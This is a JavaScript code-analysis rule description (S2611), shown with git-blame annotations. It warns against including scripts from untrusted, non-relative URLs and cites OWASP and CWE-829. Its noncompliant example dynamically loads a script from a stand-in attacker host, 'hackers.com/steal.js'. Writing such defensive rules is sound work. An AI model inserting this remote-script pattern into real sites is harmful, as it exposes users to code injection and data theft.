rspec/rules/S2611/javascript/rule.adoc

Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this rule raises an issue for each non-relative URL.


== Noncompliant Code Example

[source,javascript]
----
function include(url) {
  var s = document.createElement("script");
  s.setAttribute("type", "text/javascript");
  s.setAttribute("src", url);
  document.body.appendChild(s);
}
include("http://hackers.com/steal.js")  // Noncompliant
----

== See

* https://owasp.org/www-project-top-ten/2017/A1_2017-Injection[OWASP Top 10 2017 Category A1] - Injection
* https://cwe.mitre.org/data/definitions/829[MITRE, CWE-829] - Inclusion of Functionality from Untrusted Control Sphere
* https://www.sans.org/top25-software-errors/#cat2[SANS Top 25] - Risky Resource Management


ifdef::env-github,rspecator-view[]

'''
== Implementation Specification
(visible only on this page)

include::message.adoc[]

include::parameters.adoc[]

'''
== Comments And Links
(visible only on this page)

include::comments-and-links.adoc[]
endif::env-github,rspecator-view[]
Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00			`Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this rule raises an issue for each non-relative URL.`

Add rules 2000-2999 2020-06-30 12:48:07 +02:00
			`== Noncompliant Code Example`

RULEAPI-661: Add syntax coloring 2022-02-04 17:28:24 +01:00			`[source,javascript]`
Add rules 2000-2999 2020-06-30 12:48:07 +02:00			`----`
			`function include(url) {`
			`var s = document.createElement("script");`
			`s.setAttribute("type", "text/javascript");`
			`s.setAttribute("src", url);`
			`document.body.appendChild(s);`
			`}`
			`include("http://hackers.com/steal.js") // Noncompliant`
			`----`
Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00
			`== See`

Modify: Fix old/broken embedded links (#1100) 2022-07-08 13:58:56 +02:00			`* https://owasp.org/www-project-top-ten/2017/A1_2017-Injection[OWASP Top 10 2017 Category A1] - Injection`
RULEAPI-755 Update CWE URLs by removing .html suffix and update with https protocol (#926) * Change affects only see.adoc and rule.adoc files, not comments-and-links.adoc files 2022-04-07 08:53:59 -05:00			`* https://cwe.mitre.org/data/definitions/829[MITRE, CWE-829] - Inclusion of Functionality from Untrusted Control Sphere`
Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00			`* https://www.sans.org/top25-software-errors/#cat2[SANS Top 25] - Risky Resource Management`

Export comments and rspec-to-rspec links from jira 2021-06-02 20:44:38 +02:00
Fix the comment display: rule-id, timestamp, GH visibility, link direction 2021-06-03 09:05:38 +02:00			`ifdef::env-github,rspecator-view[]`
RULEAPI-666: Migrate the "List of parameters", "Highlighting" and "Message" fields from jira RSPEC (#346) 2021-09-20 15:38:42 +02:00
			`'''`
			`== Implementation Specification`
			`(visible only on this page)`

			`include::message.adoc[]`

			`include::parameters.adoc[]`

RULEAPI-576: add a horizontal rule between rule description and comments 2021-06-08 15:52:13 +02:00			`'''`
Export comments and rspec-to-rspec links from jira 2021-06-02 20:44:38 +02:00			`== Comments And Links`
			`(visible only on this page)`

			`include::comments-and-links.adoc[]`
Fix the comment display: rule-id, timestamp, GH visibility, link direction 2021-06-03 09:05:38 +02:00			`endif::env-github,rspecator-view[]`